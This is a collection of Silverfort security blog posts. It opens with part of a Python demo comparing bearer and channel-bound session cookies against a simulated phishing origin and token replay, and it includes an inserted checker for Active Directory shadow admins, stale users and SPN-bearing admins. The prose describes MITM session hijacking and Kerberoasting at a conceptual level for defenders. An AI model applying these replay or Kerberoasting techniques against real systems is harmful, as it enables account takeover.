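Everything here is constructed for the demo; the binding is a simplified model,
not the Token Binding wire format."""
import base64
import hashlib
import hmac
import json
import secrets
import time

RP_ORIGIN = "https://login.example.com"        # constructed relying-party origin
PHISHING_ORIGIN = "https://login.examp1e.com"  # constructed look-alike origin
SERVER_KEY = secrets.token_bytes(32)           # RP-side MAC key for session cookies
SESSION_TTL = 3600                             # 1 hour, like the SSO token lifetime in the post

def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def make_client_data(origin: str, challenge: bytes) -> str:
    """What a browser places in clientDataJSON for navigator.credentials.get()."""
    doc = {"type": "webauthn.get", "challenge": b64url(challenge), "origin": origin}
    return b64url(json.dumps(doc).encode())

def verify_client_data(client_data_b64: str, expected_challenge: bytes) -> bool:
    """RP-side check that runs before signature verification: type, challenge
    and origin must all match. A phishing origin fails here, as the post says."""
    data = json.loads(b64url_decode(client_data_b64))
    return (data.get("type") == "webauthn.get"
            and hmac.compare_digest(data.get("challenge", ""), b64url(expected_challenge))
            and data.get("origin") == RP_ORIGIN)

def issue_session(user: str, channel_id: bytes = b"") -> str:
    """Mint a MAC-protected session cookie. With channel_id == b"" it is a plain
    bearer cookie (the weakness in the post). Otherwise the MAC also covers a
    hash of the client's channel identifier, so the cookie is only valid when
    presented over that channel."""
    exp = int(time.time()) + SESSION_TTL
    channel_hash = hashlib.sha256(channel_id).hexdigest() if channel_id else ""
    payload = f"{user}|{exp}|{channel_hash}"
    tag = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{tag}"

def validate_session(cookie: str, channel_id: bytes = b"") -> tuple[bool, str]:
    """Return (ok, reason-or-user). A bearer cookie validates from any client;
    a bound cookie validates only on the channel it was minted for."""
    try:
        user, exp, channel_hash, tag = cookie.split("|")
    except ValueError:
        return False, "malformed"
    payload = f"{user}|{exp}|{channel_hash}"
    expected = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return False, "bad mac"
    if int(exp) < time.time():
        return False, "expired"
    if channel_hash and channel_hash != hashlib.sha256(channel_id).hexdigest():
        return False, "wrong channel"   # replayed from another device or connection
    return True, user

class AssertionReplayCache:
    """One-time use of the SSO token (OIDC ID token jti / SAML Response ID):
    the 'at least' mitigation the post recommends for developers."""
    def __init__(self) -> None:
        self._seen: dict[str, int] = {}

    def consume(self, assertion_id: str, exp: int) -> bool:
        now = int(time.time())
        self._seen = {k: v for k, v in self._seen.items() if v > now}  # drop expired entries
        if exp <= now or assertion_id in self._seen:
            return False
        self._seen[assertion_id] = exp
        return True

def demo() -> dict:
    """Run the three scenarios and report which checks held."""
    challenge = secrets.token_bytes(32)
    victim_channel, attacker_channel = secrets.token_bytes(32), secrets.token_bytes(32)
    bearer = issue_session("alice")                   # unbound, as in the Yubico Playground case
    bound = issue_session("alice", victim_channel)    # bound to the victim's channel
    cache = AssertionReplayCache()
    exp = int(time.time()) + 3600
    return {
        "origin_ok": verify_client_data(make_client_data(RP_ORIGIN, challenge), challenge),
        "phish_blocked": not verify_client_data(make_client_data(PHISHING_ORIGIN, challenge), challenge),
        "bearer_replay_accepted": validate_session(bearer, attacker_channel)[0],
        "bound_on_victim": validate_session(bound, victim_channel)[0],
        "bound_replay_rejected": validate_session(bound, attacker_channel) == (False, "wrong channel"),
        "assertion_first_use": cache.consume("_constructed_id_1", exp),
        "assertion_replay_rejected": not cache.consume("_constructed_id_1", exp),
    }

if __name__ == "__main__":
    print(demo())
```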
It is important to understand that modern authentication methods are not a magic security charm; it is not enough just to buy and implement them – you need to deeply understand their pros and cons.

To learn more about Silverfort, get a demo here.

---

- Published: 2024-05-02
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/silverfort-to-unveil-research-at-rsa-2024/

Next week is a big week for Silverfort. Many people on our team are heading to California to attend the annual RSA conference. If you’re visiting, come find us in Moscone South at Booth #3333.

This year is extra special for our team, though. We’re excited that one of our own rising star researchers, Dor Segal (who has spent over a decade doing security research after cutting his teeth in Israel’s 8200 unit), will be unveiling how MITM attacks can still bypass modern authentication methods like FIDO2.

Dor’s session will explore the strengths and weaknesses of passwordless authentication (FIDO2) and WebAuthn protocol fundamentals. He will demonstrate how a standard MITM attack could be used to hijack a FIDO2-authenticated session as an example of a modern authentication method, replicate the token, and use it in other sessions at will. While FIDO2 improves the security of the authentication, its defenses don’t always extend to the session itself. The way it’s implemented in most applications, specifically browsers and web-based SSO, leaves the actual session exposed to compromise. Dor will demo a MITM attack to show how an attacker can steal credentials from known federation providers like Entra ID, and he’ll propose some mitigation techniques for both application managers and developers. (Spoiler alert: Token Binding is essential!)

Stop by this session on Monday, May 6th at 10:50 in Moscone West, Room 2014.

See you there!
---
- Published: 2024-04-24
- Modified: 2024-04-24
- URL: https://www.silverfort.com/blog/5-ways-to-step-up-your-ad-hygiene-with-silverfort/

Active Directory (AD) is the backbone of most organizations' networks, managing access and authentication for users, devices and applications. While AD provides both users and administrators with central services, its security has not kept pace with growing modern security risks. Because AD is a tempting target for threat actors, this is a huge concern for businesses, forcing them to invest time and resources to ensure their AD hygiene is up to par.

### Maintaining Proper AD Hygiene is Essential

AD hygiene refers to the practices and measures implemented to ensure the cleanliness, organization, and security of an organization's AD environment. It exists to prevent, detect, and respond to security threats within the AD infrastructure. A properly maintained AD security hygiene program is essential to an organization's overall defense against identity security threats.

A fundamental aspect of AD hygiene is regular auditing and monitoring: cleaning up outdated or unused accounts, enforcing strong password policies, and monitoring user activities. This involves conducting periodic reviews of AD configurations, user accounts, group memberships, and access permissions to identify any malicious activities or anomalies.

Failure to manage AD effectively can lead to a myriad of identity security risks, with one of the most significant being a lack of visibility into users and their associated risks.

When organizations lack visibility into the types of users in their AD environment and the potential risks they pose, they are unable to effectively assess and mitigate security threats. For example, stale or orphaned accounts, unauthorized access privileges, and other types of risky accounts can go undetected, leaving an organization exposed to identity threats.

### Silverfort AD Hygiene Capabilities

Silverfort's AD hygiene capabilities help organizations proactively manage their user base by automatically discovering all user accounts, service accounts, and other types of users within their AD environment and providing centralized visibility into every authentication and access request.

Organizations gain a unified view of all users, resources, and authentication activities due to Silverfort’s native Active Directory integration, which enables it to log every authentication request.

Furthermore, Silverfort provides a user inventory that displays the types of users and resources in your environment, as well as potential security weaknesses that adversaries may exploit. This enables administrators to identify where their security risks are and how to prioritize their efforts to eliminate these risks.

By gathering actionable insights and taking proactive measures to enhance one's AD hygiene posture management, Silverfort makes it significantly harder for threat actors to target the organization, thus bolstering its overall resilience against identity threats.

### 5 Ways Silverfort Can Help You Strengthen Your AD Hygiene Posture Management

#### 1. Detect Shadow Admins

Shadow admins are users who have admin capabilities that you may not be aware of due to ACLs or nested groups.

How does Silverfort detect shadow admins? Silverfort identifies shadow admin accounts based on their privileges and the permissions they have been granted, in both on-prem and cloud environments.

Screenshot #1: Filtering for shadow admins in the Silverfort logs screen

Customer Example: At a Fortune 500 financial company, Silverfort detected 109 new shadow admins created by a single AD misconfiguration. By detecting and removing the privileges of these admin accounts, the customer decreased their attack exposure.

#### 2. Reducing NTLMv1 Usage

NTLMv1 is inherently insecure due to its use of weak encryption (DES) to encrypt the session key. This encryption type can be easily broken, and the user's password can be extracted.

How does Silverfort detect NTLMv1? Silverfort monitors all authentications processed by Active Directory without using event logs. It identifies which devices are sending NTLMv1 authentication requests and sends alerts to the logs screen inside the Silverfort platform.

Screenshot #2: Filtering for users who are using NTLMv1 in the Silverfort logs screen

Customer Example: In a leading global manufacturer’s environment, Silverfort discovered that around 5-8% of admin users still authenticate with the NTLMv1 protocol, which was exposing their user passwords to compromise. Weekly reports are now sent to the team so they can reduce and ultimately eliminate the use of NTLMv1.

#### 3. Discover Stale Users

Stale users are accounts that have not been used for a while; for example, former employees’ accounts that have not been disabled. Certain types of stale accounts are difficult to identify unless you are able to monitor their authentication activity. As an example, identifying service accounts is difficult since their information is not available natively.

How does Silverfort detect stale users? Silverfort automatically identifies and discovers stale users based on a lack of user activity data and information gathered from logs and other sources.

Screenshot #3: Filtering for stale users in the Silverfort logs screen

Customer Example: At a leading US retail company, Silverfort detected that 13% of user accounts were stale users who had not performed any recent activity. This helped the company to clean up its Active Directory by disabling or removing the unused accounts, which ultimately reduced licensing and other costs.

#### 4. Disable Admins with SPN

Having a Service Principal Name (SPN) associated with an admin account can expose it to a Kerberoasting attack, where an attacker requests the Kerberos ticket and obtains a payload encrypted by the user’s password hash. Attackers can then brute force this payload to expose the credentials and compromise the account.

How does Silverfort detect admins with SPN? Silverfort detects these types of accounts by monitoring authentication events involving Service Principal Names (SPNs) within the network. It utilizes behavioral analytics and user behavior profiling to identify deviations from normal patterns, such as unusual access requests or privilege escalation attempts associated with admin privileges.

Screenshot #4: Filtering for admins with SPN in the Silverfort logs screen

Customer Example: In a large healthcare provider’s AD environment, Silverfort discovered 8 admins with SPN that the customer was not aware of. This helped the customer to limit their exposure to potential Kerberoasting attacks and decrease their attack surface exposure.

#### 5. Removing PrintNightmare

PrintNightmare is a critical security vulnerability affecting Windows’ Print Spooler service that allows remote code execution and could lead to unauthorized access or system compromise.

How does Silverfort detect bad authentications from patched Print Spooler services? Silverfort detects PrintNightmare by analyzing authentication events and abnormal service behavior and triggering alerts for further investigation and mitigation. Microsoft explains how to fully mitigate PrintNightmare, but with Silverfort you can completely skip the problematic network packet capture, as it will alert on all the bad Print Spooler authentications.

Screenshot #5: Filtering for abnormal authentications in the Silverfort logs screen

Customer Example: A large US school district detected PrintNightmare in their environment thanks to Silverfort. With Silverfort they fixed this issue and reduced the number of unnecessary authentications in their environment by about 70%.
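Three of the checks above (shadow admins hiding behind nested groups, stale users, and admin accounts that carry an SPN) boil down to set logic over a directory inventory. The block below is an added example, not Silverfort's code or the product's method: it runs the same three checks over a constructed snapshot of groups and user attributes, so you can see what each finding actually means. The group names, users, SPN and logon dates are all made up; the "nested group" case is the one the post describes, while ACL-based shadow admins are out of scope here. The 365-day stale threshold is an assumption; note that in a real domain `lastLogonTimestamp` is replicated with a lag of up to 14 days by default, so a window of that size is safely above the replication noise.

```python
"""Three AD hygiene checks run over a constructed directory snapshot.

Added example (not Silverfort code): finds shadow admins that inherit
privilege through nested groups, stale users judged by last logon, and
effectively privileged accounts that also carry an SPN.
"""
from datetime import datetime, timedelta, timezone

# Constructed sample data, not taken from any real directory.
# Group -> direct members; a member that is itself a key in GROUPS is a nested group.
GROUPS = {
    "Domain Admins": ["alice", "Tier0-Ops"],
    "Tier0-Ops": ["bob", "Helpdesk-Leads"],      # nested one level below Domain Admins
    "Helpdesk-Leads": ["carol", "Tier0-Ops"],    # nesting cycle: must not recurse forever
    "Backup Operators": ["dave"],
}
# Groups an auditor reviews directly. Anyone who is effectively a member of one
# of these without appearing in its direct member list is a shadow admin.
PRIVILEGED_GROUPS = {"Domain Admins", "Backup Operators"}

NOW = datetime(2024, 4, 24, tzinfo=timezone.utc)
USERS = {
    "alice": {"last_logon": NOW - timedelta(days=2),   "spn": []},
    "bob":   {"last_logon": NOW - timedelta(days=400), "spn": []},
    "carol": {"last_logon": NOW - timedelta(days=1),   "spn": ["MSSQLSvc/db01.corp.example:1433"]},
    "dave":  {"last_logon": NOW - timedelta(days=30),  "spn": []},
    "erin":  {"last_logon": None,                      "spn": []},  # never logged on
}


def effective_members(group, groups, seen=None):
    """Expand nested membership transitively; `seen` guards against cycles."""
    seen = set() if seen is None else seen
    seen.add(group)
    members = set()
    for member in groups.get(group, []):
        if member in groups:
            if member not in seen:
                members |= effective_members(member, groups, seen)
        else:
            members.add(member)
    return members


def shadow_admins(groups, privileged):
    """Users privileged only through nesting, i.e. absent from the direct member lists."""
    direct, effective = set(), set()
    for g in privileged:
        direct |= {m for m in groups.get(g, []) if m not in groups}
        effective |= effective_members(g, groups)
    return effective - direct


def stale_users(users, now, max_age_days=365):
    """Accounts with no logon inside the window, or that never logged on at all."""
    cutoff = now - timedelta(days=max_age_days)
    return {u for u, attrs in users.items()
            if attrs["last_logon"] is None or attrs["last_logon"] < cutoff}


def admins_with_spn(users, groups, privileged):
    """Effectively privileged accounts that also carry an SPN (Kerberoasting exposure)."""
    admins = set()
    for g in privileged:
        admins |= effective_members(g, groups)
    return {u for u in admins if users[u]["spn"]}


def hygiene_report(users=USERS, groups=GROUPS, privileged=PRIVILEGED_GROUPS, now=NOW):
    """Collect the three findings as sorted lists, ready to feed a ticket or report."""
    return {
        "shadow_admins": sorted(shadow_admins(groups, privileged)),
        "stale_users": sorted(stale_users(users, now)),
        "admins_with_spn": sorted(admins_with_spn(users, groups, privileged)),
    }


if __name__ == "__main__":
    for finding, accounts in hygiene_report().items():
        print(f"{finding}: {', '.join(accounts) or 'none'}")
```

On the sample data `bob` and `carol` surface as shadow admins (carol only through two levels of nesting), `bob` and `erin` as stale, and `carol` as a privileged account with an SPN. An account in that last set is the usual candidate for moving the service it fronts to a group managed service account, or at minimum for a long random password, since the SPN lets any domain user request a ticket encrypted under its password hash.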
### Real-Time Visibility and Actionable Insights are Critical for AD Hygiene

To maintain proper Active Directory hygiene and strengthen identity security posture management within organizations, it is crucial to have end-to-end visibility and actionable insights into all your users and resources. By having all the insights into your AD user base, you can take proactive steps to ensure that your user base is not opening the door to identity threats. This will strengthen your overall identity security posture management (ISPM).

By investing the resources to step up your AD hygiene, you will ensure its cleanliness and security are up to date, preventing your AD environment from being compromised and used as a gateway for attackers to gain unauthorized access to sensitive data.

Looking to strengthen your AD hygiene and gain complete visibility across your environment? Reach out to one of our experts here.

---
- Published: 2024-03-26
- Modified: 2024-10-02
- URL: https://www.silverfort.com/blog/the-identity-underground-report-deep-insight-into-the-most-critical-identity-security-gaps/

We’re proud to unveil the first report based on Silverfort’s proprietary data: The Identity Underground Report. This data, gathered and analyzed from hundreds of production environments, discloses the key security gaps – or Identity Threat Exposures (ITEs) – that adversaries exploit to launch identity threats such as credential access, privilege escalation and lateral movement. This is the first ever comprehensive analysis of these weaknesses. In fact, some of these ITEs have never been disclosed at all – until now. The results are alarming: no environment is free from the gaps that give attackers easy opportunities to access credentials, escalate privileges, and move laterally with little to no resistance.

Are you a CISO? Then you’ll want to ask your team if the common gaps in the report apply to your environment as well. These are the culprits behind the attacks that keep you awake at night. Knowing them should become a factor in your decision making.

Are you a security architect or a SOC manager? You already know that identity is the most abused attack surface in account takeover, lateral movement, and ransomware spread. Now you can gain full insight into what you need to protect.

And finally, are you accountable for the identity security in your organization? Then you’ll find all the challenges you’re already confronting daily: shadow admins, NTLMv1, unconstrained delegation, service accounts, password sync and many more.

### These gaps enable threat actors to win the war against identity threats

Identity threats are at large. Lateral movement, preceded by credential theft and privilege escalation, is now a key part of almost every ransomware campaign. Yet a thorough understanding of the scope and nature of the gaps that make these attacks possible is not part of organizations’ cybersecurity playbooks. In fact, they don’t even have a name. They are not software vulnerabilities with an assigned CVE, nor are they malware. Rather, they are an inevitable result of misconfigurations, malpractices, legacy infrastructure, and insecure built-in features. They share a common denominator: each of them exposes its environment to an identity-related TTP, such as credential access, privilege escalation, or lateral movement. This is why we call them Identity Threat Exposures (ITEs).

The Identity Underground Report is the first report to shed light on the dark corners of the identity infrastructure, unveiling the ITEs that are most prevalent, impactful and exploitable. Put simply, at least some of them reside in your environment.

### Report highlights: Active Directory ITEs endanger the SaaS environment

Key insight #1: Active Directory (AD) is critically exposed to identity threats

Around 90% of organizations employ a hybrid identity infrastructure. This means Active Directory (AD) still plays a key role alongside cloud directories or federation servers. However, AD is infested with misconfigurations, legacy infrastructure, and built-in insecure features. These, together with common malpractices, turn it into an extremely low-resilience attack surface. In simple terms, attackers can easily use the AD environment to slip through to the target environment for ransomware, data theft, or any other purpose. This report discloses the most prominent ones.

Key insight #2: AD’s exposure to identity threats also endangers the SaaS environment

The common practice of syncing AD passwords to the organization’s cloud Identity Provider (IdP) has significant productivity benefits. It can also create a critical threat exposure. Consider this: when passwords are synced, attackers can use the passwords they’ve compromised in the AD environment for malicious access to the SaaS environment. As the report shows, ITEs that expose user passwords in the AD environment are extremely prevalent, enabling attackers to leverage on-prem weaknesses to breach the cloud.

### Knowledge matters: what is my environment’s identity threat exposure?

The report’s main role is to empower you to take action. How does your environment measure up against the average numbers? Do you have shadow admins, shared users, or heavy NTLM authentication traffic? Are there service accounts that were inadvertently synced to your cloud IdP? And so on and so forth.

The Identity Underground Report won’t give you these answers – but it will point you to the right questions to ask to discover your true identity resilience.

---
- Published: 2024-03-02
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/mfa-protection-for-air-gapped-networks/

The recent cyberattacks launched as part of the Russia-Ukraine war have reawakened concerns about the security of air-gapped networks, particularly regarding identity protection.
Air gapping is implemented to reduce the attack surface of a highly sensitive network, such as the ones found in nations’ critical infrastructure, military and governmental environments, and manufacturing shop floors. These types of networks are likely to be targeted by threat actors, since attacking them serves as an alternative expression of hostility while refraining from conventional warfare. In this article, we explore how the Silverfort Unified Identity Protection platform enforces secure authentication within air-gapped environments by enabling the use of FIDO2 hardware tokens for MFA without agents, code modification, or authentication infrastructure changes. In this manner, Silverfort provides these networks real-time protection against lateral movement and automated malware propagation.

### What is an Air-Gapped Network?

Air-gapped networks are computer networks with no interfaces connected to the outer world. This is obviously a drastic measure, so the approach is typically only used by highly sensitive organizations that require maximum levels of security. Air-gapped networks are production environments where the machines comprising the environment have no outward-facing connection, either directly to the Internet or indirectly through an outbound-facing internal network. Networks are air-gapped to reduce their attack surface and increase their resilience to cyberattacks.

Some prominent examples of air-gapped networks include various national security actors such as defense, government and military bodies, as well as critical infrastructure entities that provide energy, water utilities and other enabling services. Organizations of these types strive to segregate their most sensitive network segments entirely, so they are cut off from any internet connection.

### Air-Gapped Networks are Still Exposed to Malicious Infiltration

While this approach makes sense in theory, in practice there are various constraints that make full air-gapping a nearly impossible task. What usually happens is that a certain degree of connectivity to the outside world is still maintained, regardless of all initial intentions, mostly for operational reasons: operators who need to transfer external files into the network, software updates, and remote technical support are just a few common examples. At the end of the day, all this adds up to an inherent inability to implement a true 100% air-gapped architecture. The Stuxnet malware, which was initially introduced into air-gapped networks using infected removable drives such as USB flash drives, should be a constant reminder that initial access to an air-gapped network remains possible.

### Lateral Movement in Air-Gapped Networks

Once attackers have established an initial foothold in the air-gapped network, they can follow up with lateral movement, using stolen passwords and credentials to expand their presence and increase the attack’s impact. In 2017, the infamous NotPetya attack performed such lateral movement in both standard IT networks as well as air-gapped OT networks.

So, air gapping by itself cannot vouch for the ironclad protection its name implies. It might have been possible way in the past, but in today’s hyperconnected IT environment, it’s simply impractical. This calls for a re-evaluation of how such networks should best be protected, both from initial malicious access and from lateral movement in a post-compromise phase.

### What Restraints Make Air-Gapped Network Protection a Challenge?

Air-gapped networks cannot be easily protected with standard security solutions. First and foremost, any solution that relies on cloud connectivity or internet connectivity cannot be used. Second, a main feature of air-gapped networks is their commitment to 24x7x365 operational stability. For example, this means that it's impossible to reboot them after a software install or patch is applied. In many cases, these networks also employ other proprietary systems that are under strict vendor warranty terms that don’t allow installation of 3rd party software on the servers. Also, you can often find legacy systems that are still active in these networks, even if manufacturer support no longer exists. This rules out any type of agent-based solution. And third, the nature of these networks increases their sensitivity to operational disruption caused by false positives or the breaking of critical processes while blocking malicious activity. All of these considerations significantly narrow the scope of security products that can be used in air-gapped networks.

### Requirements for Multi-factor Authentication in Air-Gapped Networks

Overcoming the Built-In Security Restraints

Multi-Factor Authentication (MFA) is the ultimate solution against attacks that utilize compromised credentials to access targeted resources, such as account takeovers and lateral movement. However, to be effective in an air-gapped network, an MFA solution must meet several criteria, per the constraints we’ve described above:

- Is able to fully function without relying on internet connectivity
- Does not require the deployment of agents on the machines it protects
- Creates minimal disruption and does not endanger the stability and availability of sensitive systems and processes

Hardware Token Support

In addition, the common practice in air-gapped networks is to use physical hardware security tokens in place of the standard mobile devices that require internet connectivity. This consideration adds another requirement:

- Is able to utilize a hardware token to provide the second authentication factor

FIDO2 is the preferred standard for hard tokens and is considered resilient to both advanced and traditional phishing attacks. However, FIDO2 tokens can be used only with the WebAuthn or U2F authentication protocols. If the systems within the air-gapped network weren’t designed initially to work with these protocols, it would be extremely difficult to perform the required alteration (see above on 24/7/365 availability). As a result, the last requirement is not easily satisfied, leaving many air-gapped networks exposed to attacks.

### Silverfort Secure Authentication for Air-Gapped Networks

Our mission at Silverfort is to extend secure authentication to all users, access interfaces and resources. We have succeeded in applying MFA protection to resources that could never have been protected in this manner before, such as IT infrastructure, file shares, databases, IIoT, and even OT systems like HMIs and production servers. Aligning with this vision, Silverfort also provides agentless MFA protection for air-gapped networks, enabling the use of FIDO2 hardware tokens without any code changes on the protected systems:

- A Dedicated Deployment Mode Agnostic to Internet Connectivity: Silverfort offers a full on-prem deployment mode. In this mode, Silverfort is deployed as a Virtual Appliance on-premises, with full functionality available. Note that Silverfort also offers a SaaS-based deployment option and a hybrid on-premise/SaaS deployment option.
- Agentless Architecture with No Code Changes Required: Silverfort’s unique innovative architecture allows organizations to extend Multi-Factor Authentication to any system or resource, without installation of agents on the protected machines, and without requiring any code customization or any alteration of the authentication protocols.
- FIDO2 Compliant Hardware Tokens: Silverfort enables organizations to choose their authenticator in the air-gapped environment, including all FIDO2 hardware tokens. The most popular implementation within our customers’ ecosystem is our integration with YubiKey tokens. This seamless integration bridges the gap between modern FIDO2 tokens and your existing authentication infrastructure to provide comprehensive MFA protection to the air-gapped network.

### Conclusion

Air-gapping is a sound security strategy, but one must acknowledge both its gaps and its implications for the security products you can use. Silverfort’s MFA enables you to enforce secure authentication and validate the identity of users in air-gapped networks, ensuring they are protected against identity-based attacks.

---
- Published: 2024-02-21
- Modified: 2025-07-21
- URL: https://www.silverfort.com/blog/identity-risks-of-stale-user-accounts/

One of the biggest security weaknesses organizations face is their own employees. This isn't pleasant, but it is a reality we must accept. When they make mistakes, they open the door to attackers. This is even more true when dealing with the user accounts of previous employees.

It's a common misconception that the primary risk associated with former employees' accounts lies in the potential for disgruntled ex-workers to use their credentials maliciously. Even though insider threats pose a significant risk, there is another danger that often goes unnoticed: external attackers compromising unmonitored accounts. In many cases, these accounts become forgotten relics of past employment, left unchecked and unmonitored as employees move on to new opportunities. It is precisely this neglect that makes them such attractive targets for cybercriminals.

### Common Challenges and Risks of Ex-Employee Accounts

Attackers are aware that these inactive accounts or stale user accounts, commonly known as 'leavers', are often overlooked by organizational security measures. Most IT teams will remove these accounts’ privileges and access to critical resources, but this is not always the case.
Even though we would never want to imagine that our employees are capable of malicious actions, failure to revoke a leaver's access can leave the door open for sensitive company information to be misused and leaked. It is also important to note that lingering accounts pose a risk in terms of password usage. If an active leaver's account uses a duplicate or insecure password, third parties may have easy access to your organization.

Since the former employee may still possess high-privilege access and permissions due to their tenure, attackers have an attractive target to help them gain a foothold in an environment. Whether it is accessing sensitive data, infiltrating critical systems, or initiating lateral movement within the network, compromising these overlooked accounts has the potential to cause significant damage. The most common example would be the case of a super admin who is let go. Their user account has access to most critical resources, yet IT does not disconnect the account or remove its privileged access.

### Real-Life Example: Threat Actors Leveraged Ex-Employee Accounts to Breach State Government Systems

According to the Cybersecurity and Infrastructure Security Agency (CISA), a threat actor gained access to a US government organization's network using a former employee's administrative login credentials. By using compromised credentials, the attackers were able to access an internal VPN and the on-prem environment and execute LDAP queries on a domain controller. The organization, which CISA has not named, failed to remove the former employee's account, which allowed the threat actor to analyze the environment and its resources. The credentials allowed access to two virtualized servers, SharePoint and the employee's workstation. A second employee's credentials were extracted from the SharePoint server and used to authenticate to the on-prem Active Directory and Entra ID (Azure AD), thereby gaining administrative access.

Both virtualized servers have been taken offline and the user account has been disabled. In addition to changing the credentials for the second compromised account, the victim organization also removed its administrative privileges. Additionally, CISA noted that neither of the administrative accounts had MFA enabled.

As this example illustrates, even following best practices throughout your IT security strategy is not sufficient when dealing with attackers. Instead of assuming you have done enough to secure the accounts of former employees, it is best to add more concrete identity security controls that deny access as a means of ensuring the safety of these accounts.

### How Silverfort Secures Former Employee Accounts

Silverfort enables identity teams to easily discover former employee accounts in their environments and either delete them or remove their permissions. Silverfort classifies accounts that have not been used for a year or more as “stale users”. With Silverfort you can gain complete and continuous visibility into stale users and apply appropriate security measures, such as enforcing block access policies on these user accounts. Let’s see exactly how this is done in Silverfort’s console:

Visibility Into Stale Users

Silverfort automatically discovers all accounts in your environment, including stale user accounts, and provides real-time visibility into all user activity. This enables you to detect and respond to potential security threats, including blocking the access of any accounts that display anomalous behavior. In Silverfort's Insights screen, you will see an in-depth identity inventory that displays the types of users and resources in your environment as well as weaknesses in your security. Under Users & Passwords, you can find the entire list of stale users in your environment. Silverfort detects and categorizes these accounts by the common attributes of stale user accounts.

Screenshot #1: Discovering the number of stale users in the Insights screen

Clicking on the Stale Users space opens a window that shows you full details on these accounts. Now that you have the names of these stale users, you can locate them in your IdP and either remove their permissions, delete them altogether, or apply a deny access policy to the user account.

Screenshot #2: Displaying the complete list of stale users

The Power of Deny

To take a more proactive approach to preventing ex-employee user accounts from creating any more security risks, it’s recommended that you create a ‘Leavers’ deny access policy. This will ensure that if a malicious actor compromises a stale account to gain access to anything in your environment, they will be automatically denied access.

Screenshot #3: Deny access policy to prevent stale user access

In Silverfort’s Policies screen, create a new policy. Check your IdP as the Auth Type, then check either Kerberos/NTLM or LDAP, depending on your needs. Choose Static Based for the policy type, and for User and Group, assign it to the Leavers group or whatever similar name you use for employees who are leaving or have left. Next, under Action, choose Deny. Once enabled, this policy will automatically deny access to any account to which it is assigned. If such an account were compromised, this policy would deprive an adversary of the ability to use it for malicious access.

### Real-Time Visibility and Protection are Critical to Mitigating the Risks of Former Employee Accounts

Many types of security threats can endanger your organization in today's hybrid environment, so comprehensive security requires complete visibility, monitoring, and protection. The visibility of stale users and the blocking of any access requests are important for ensuring attackers will not use these accounts to gain access to other parts of the environment. By applying continuous monitoring and active policy enforcement to every type of employee account, Silverfort can both automate the discovery of stale users and deliver real-time protection against their abuse.

Looking to solve identity protection challenges in your environment? Reach out to one of our experts here.

---
- Published: 2024-02-06
- Modified: 2024-07-10
- URL: https://www.silverfort.com/blog/identity-protection-action-items-following-midnight-blizzard-attack/

In light of the Midnight Blizzard attack, it’s evident that our cybersecurity strategies must evolve to keep pace with the sophisticated tactics employed by nation-state actors. This particular breach, initiated through a password spray attack on a legacy, non-production test tenant, underscores several critical areas for immediate action and reflection within our cybersecurity practices:

### Enhanced Focus on Multi-factor Authentication (MFA)

While Microsoft now enforces MFA by default to bolster security, this incident accentuates the need for organizations to meticulously review all existing tenants, including older ones, to ensure they are also protected by MFA. It’s a stark reminder that legacy systems and configurations can provide inadvertent backdoors to attackers, making it imperative that we extend modern security measures retrospectively across all digital assets.

### Test Tenant Overprivileges

A critical lapse identified in the attack was the excessive permissions granted to a test tenant, which inadvertently allowed access to Microsoft’s corporate environment. This incident emphasizes the necessity of stringent monitoring and restriction of permissions for OAuth apps and other integrations within both production and non-production environments. Ensuring that test tenants adhere to the principle of least privilege and are segregated from production systems is vital in minimizing the risk of such breaches.
### The Deceptive Nature of Phishing

Seeing that the business email of such security-aware companies can be compromised reminds us all not to treat the sender address as proof of an email’s authenticity. Even if you receive a legitimate-looking email from a company you trust, remember that it’s always possible that they’ve been hacked. So avoid entering your credentials after clicking on email links; instead, sign in by typing the address into your browser yourself – if you use Single Sign-On it shouldn’t be too much of a hassle. Also be careful opening files received by email: if you need to receive files this way, verify them with the sender before opening, or open the files in a sandbox.

To learn more about how Silverfort takes identity protection where it has never gone before, request a demo.

---
- Published: 2024-01-23
- Modified: 2024-09-16
- URL: https://www.silverfort.com/blog/silverfort-raises-116m-to-lead-identity-security-market/

What a year... Despite the economic and geo-political challenges we’ve been experiencing over the last months, Silverfort has grown at a tremendous pace. In 2023, as in the three years prior, we grew our annual recurring revenues (ARR) more than 100% year-over-year, adding tens of millions in new ARR. Much of this success is thanks to our amazing channel partners, who are the heart of our growth strategy. Some of the world’s largest enterprises now trust Silverfort to protect their corporate identities, including multiple Fortune 25 companies, with more than 100 new customers joining us each quarter. I am incredibly thankful to our customers for partnering with us and helping us build this company and product. To meet this significant demand, our team also grew by 60% in 2023 to nearly 300 employees across the globe, all dedicated to delivering the best product and experience for our customers.
Today, we announce $116M in new financing from Brighton Park Capital (BPC), alongside many of our existing investors, bringing our total funding to $222M. The BPC team has been great to work with throughout the fundraising process. They have an impressive level of understanding of our market and they share our vision for it. They also bring a lot of experience that will help us as we build a large company and reshape the way identity protection is done in every organization. Before I say anything else, I want to thank our team for making this success and this milestone possible. When we founded this company, I hoped to build a culture where people work together in true teamwork, and where ideas, creativity, and inclusivity thrive. Silverfort was recently recognized as the best startup company to work for in Israel for the second year in a row, and I couldn’t be prouder. This team’s hard work, customer-focus, and commitment to solving challenging problems is why we are seeing these great results and why I am so excited about where we will take this company and product next. Thank you for joining me in building this. Why Identity When Yaron, Matan, and I started this company, our goal was to solve a very difficult and rapidly growing problem that many organizations face. Compromised identities are now the weapon of choice for attackers, making identity the most vulnerable element of the enterprise attack surface. Attackers are taking advantage of the blind spots that exist in almost every organization’s IAM infrastructure, which couldn’t previously be protected. 
This can be partially attributed to a market misperception that IAM providers, who manage identities, are also responsible for securing them, while in fact they are not able to, for two major reasons:

1. The migration of many enterprises to hybrid and multi-cloud environments created a fragmented, complex IAM infrastructure: 92% of companies are now using a combination of cloud-native and on-prem identity solutions, often from multiple competing vendors. Each identity solution operates as a “silo” with its own local security controls, without understanding the broader context of a user’s activity and without any consistent enforcement measures that work across the distributed identity environments.
